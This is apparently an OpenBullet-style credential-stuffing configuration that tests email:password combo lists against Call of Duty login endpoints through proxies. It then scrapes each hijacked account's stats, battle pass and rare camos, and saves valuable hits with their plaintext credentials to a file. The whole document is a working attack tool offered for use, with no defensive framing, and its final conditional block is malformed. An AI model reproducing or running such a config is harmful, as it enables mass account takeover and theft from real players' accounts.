[SETTINGS]
{
  "Name": "HDTragic",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-12-31T01:24:07.4299819-07:00",
  "AdditionalInfo": "",
  "Author": "HDTragic",
  "Version": "1.4.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION RandomGUID -> VAR "0" 

#Log REQUEST POST "https://profile.callofduty.com/cod/mapp/registerDevice" 
  CONTENT "{\"deviceId\":\"<0>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Content-Type: application/json" 

#Code PARSE "<SOURCE>" JSON "authHeader" -> VAR "1" 

#Log REQUEST POST "https://profile.callofduty.com/cod/mapp/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Content-Type: application/json" 
  HEADER "Authorization: bearer <1>" 
  HEADER "x_cod_device_id: <0>" 

#Login KEYCHECK 
  KEYCHAIN Success OR 
    KEY "success\":true" 
  KEYCHAIN Failure OR 
    KEY "success\":false" 
    KEY "errorMessage\":\"JSON parse " 

PARSE "<SOURCE>" JSON "ACT_SSO_COOKIE" -> VAR "4" 

#Info REQUEST GET "https://profile.callofduty.com/cod-mobile/userInfo/<4>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-us" 
  HEADER "atvi-auth: Bearer <4>" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#1 PARSE "<SOURCE>" LR "emailValidated\":" ",\"" CreateEmpty=FALSE -> CAP "EmailValidated" 

#2 PARSE "<SOURCE>" LR "gamerAccountLinked\":" ",\"" CreateEmpty=FALSE -> CAP "GamerAccountLinked" 

#Country PARSE "<SOURCE>" LR "countryCode\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Country" 

#Profile REQUEST GET "https://www.callofduty.com/api/papi-client/crm/cod/v2/identities/<4>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-us" 
  HEADER "atvi-auth: Bearer <4>" 
  HEADER "Accept-Encoding: gzip, deflate, br" 

#Games PARSE "<SOURCE>" JSON "title" Recursive=TRUE CreateEmpty=FALSE -> CAP "Games" 

#Platform PARSE "<SOURCE>" JSON "platform" Recursive=TRUE CreateEmpty=FALSE -> CAP "Platform" 

#Platform PARSE "<SOURCE>" JSON "platform" -> VAR "2" 

#User PARSE "<SOURCE>" JSON "username" -> VAR "3" 

#Free KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "{\"status\":\"success\",\"data\":{\"titleIdentities\":[]}}" 

#encode_user FUNCTION URLEncode "<3>" -> VAR "3" 

#Stats REQUEST GET "https://www.callofduty.com/api/papi-client/stats/cod/v1/title/mw/platform/<2>/gamer/<3>/profile/type/mp?locale=en" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "atvi-auth: Bearer <4>" 

#all PARSE "<SOURCE>" JSON "all" -> VAR "all" 

#Level PARSE "<SOURCE>" JSON "level" CreateEmpty=FALSE -> CAP "Level" 

#KD PARSE "<SOURCE>" JSON "kdRatio" CreateEmpty=FALSE -> CAP "K/D" 

#Kills PARSE "<all>" JSON "kills" CreateEmpty=FALSE -> CAP "Kills" 

#Prestige PARSE "<SOURCE>" JSON "prestige" CreateEmpty=FALSE -> CAP "Prestige" 

#User PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "User" 

#WZ PARSE "<SOURCE>" JSON "br" -> VAR "WZ" 

#wins PARSE "<WZ>" JSON "wins" CreateEmpty=FALSE -> CAP "WZ Wins" 

#kd PARSE "<WZ>" JSON "kdRatio" CreateEmpty=FALSE -> CAP "WZ K/D" 

#Kills_Checker KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "<Kills>" LessThan "40000" 
    KEY "<WZ Wins>" LessThan "100" 
    KEY "<Prestige>" LessThan "4" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<WZ Wins>" DoesNotExist 
    KEY "<WZ Wins>" EqualTo "" 
    KEY "<Kills>" EqualTo "" 
    KEY "<Kills>" DoesNotExist 

#BattlePass REQUEST GET "https://www.callofduty.com/api/papi-client/loot/title/cw/platform/<2>/gamer/<3>/status/en" 
  

  HEADER "atvi-auth: Bearer <4>" 
  HEADER "Accept: application/json, text/plain, */*" 

#BP1 PARSE "<SOURCE>" JSON "loot_season_1" -> VAR "BP1" 

#BP1_Tier PARSE "<BP1>" JSON "tier" CreateEmpty=FALSE -> CAP "S1T" 

#BP1_Premium PARSE "<BP1>" JSON "premium" CreateEmpty=FALSE -> CAP "S1P" 

#Camo REQUEST GET "https://www.callofduty.com/api/papi-client/loadouts/v3/title/mw/platform/<2>/gamer/<3>/mode/mp" 
  
  HEADER "atvi-auth: Bearer <4>" 
  HEADER "Accept: application/json, text/plain, */*" 

IF "<SOURCE>" Contains "org.springframework.web.client.HttpClientErrorException","message":"404 NOT FOUND"

FUNCTION Constant "No" -> CAP "Camo" 

ELSE

FUNCTION Constant "Yes" -> CAP "Camo" 

ENDIF

PARSE "<SOURCE>" LR "playerCamosOwnedByWeapon\":{\"" "}}}}" -> VAR "CAMO" 

IF "<CAMO>" Contains "camo_11a"

FUNCTION Constant "True" -> CAP "Gold" 

ELSE

FUNCTION Constant "False" -> CAP "Gold" 

ENDIF
IF "<CAMO>" Contains "camo_11b"

FUNCTION Constant "True" -> CAP "Platinum" 

ELSE

FUNCTION Constant "False" -> CAP "Platinum" 

ENDIF
IF "<CAMO>" Contains "camo_11c"

FUNCTION Constant "True" -> CAP "Damascus" 

FUNCTION CountOccurrences "camo_11c" "<CAMO>" -> VAR "HMD" 

ELSE

FUNCTION Constant "False" -> CAP "Damascus" 

ELSE
IF "<HMD>" GreaterThan "10"

FUNCTION Constant "True" -> CAP "Damascus" 

ELSE

FUNCTION Constant "False" -> CAP "Damascus" 

ENDIF
IF "<CAMO>" Contains "camo_11d"

FUNCTION Constant "True" -> CAP "Obsidian" 

FUNCTION CountOccurrences "camo_11d" "<CAMO>" -> CAP "Obsidian Count" 

ELSE

FUNCTION Constant "False" -> CAP "Obsidian" 

ENDIF
IF "<Damascus>" Contains "True"

UTILITY File "Hits\\HDTragic.txt" Write "««««««[Account]»»»»»»\\nCombo:<USER>:<PASS>\\nMail:<USER>\\nPassword:<PASS>\\n««««««««««««[INFORMATION]»»»»»»»»»»»»\\nGames : <Games>\\nPlatform : <Platform>\\nLevel : <Level>\\nKills : <Kills>\\nK/D : <K/D>\\nWZ Wins: <WZ Wins>\\nWZ K/D : <WZ K/D>" 

ENDIF

